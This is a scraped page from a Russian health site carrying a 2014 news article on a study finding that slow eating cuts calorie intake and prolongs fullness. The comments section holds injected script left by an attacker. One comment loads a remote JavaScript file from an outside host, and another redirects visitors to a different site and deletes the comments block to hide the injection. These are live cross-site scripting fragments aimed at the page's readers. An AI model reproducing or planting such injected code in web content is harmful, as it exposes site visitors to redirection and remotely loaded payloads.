Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как избавиться от 100 кал...  >>  Как избавиться от 100 калорий в обед без усилий?
 
Обратная связь
 

Как избавиться от 100 калорий в обед без усилий?

Размер шрифта
13 августа 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, чтобы потреблять меньше калорий, необязательно ограничивать себя в еде, достаточно есть медленно и наслаждаться каждым кусочком – к такому выводу пришли ученые. Согласно новому исследованию Университета Техаса, если тратить на трапезу больше времени, вы съедите меньше, а также дольше будете чувствовать себя сытыми.

Как избавиться от 100 калорий в обед без усилий?

В исследование были включены 70 человек с нормальным весом, избыточным весом и ожирением, которые были разделены на 2 группы. Одну группу попросили есть быстро, другую – медленно. Затем эксперимент был повторен, только задания поменяли местами между двумя группами.  

По результатам работы, когда люди с нормальным весом ели медленно, они потребляли в среднем на 88 калорий меньше (примерно 10% еды), чем когда они ели быстро. Люди с избыточным весом потребляли на 8% меньше пищи. Также в обеих группах ощущение сытости сохранялось на 60 минут дольше, когда участники ели медленно.

«Возможно, более медленное поедание пищи дает людям лучше ощутить чувство голода и насыщения», – объясняет соавтор работы Мина Ша. Недавние исследования показали, если есть из более тяжелых тарелок или есть маленькими кусочками, то мозг верит в то, что вы потребляете большее количество еды. Таким же образом, более медленная скорость ведет к увеличению времени жевания, что может увеличивать чувство насыщения, даже если вы едите меньше.

«Также ученые обнаружили, что люди пьют больше воды, когда едят медленно, и эта вода заполняет место в желудке, которое иначе заняла бы еда», – добавляет доктор Ша.

Согласно исследованию, участники эксперимента тратили на еду 9 минут, если ели быстро, и 22 минуты, если медленно. Попробуйте посоревноваться во времени с «медленными едоками» – ешьте маленькими кусочками, тщательно пережевывайте пищу, делайте паузы, чтобы сделать глоток воды. «Следуйте этим советам и тогда вы будете употреблять меньше калорий и дольше чувствовать себя сытыми», – говорит Мина.

Другие секреты похудения раскрываются на страницах нашего специального проекта «Сбрось лишнее».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:31

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Сколько надо сбросить, чтобы не заболеть раком! Ответ в конце статьи!   Даже свет во сне приводит к лишним килограммам! Как похудеть?!   В новый год – с новым весом!   Как воспитывать ребенка, чтобы он не был толстым?  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть!
 
05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная? 31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!
 

Слайдшоу

1
Почему вы не можете похудеть? 5 причин. Часть 2
Еда в новый год: продукты-обманщинки
Сладкие искусители, которые не дают вам похудеть

Тесты

1
Есть ли у вас избыточный вес?
Готовы ли вы сбросить лишнее?
Будет ли у вас инфаркт?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.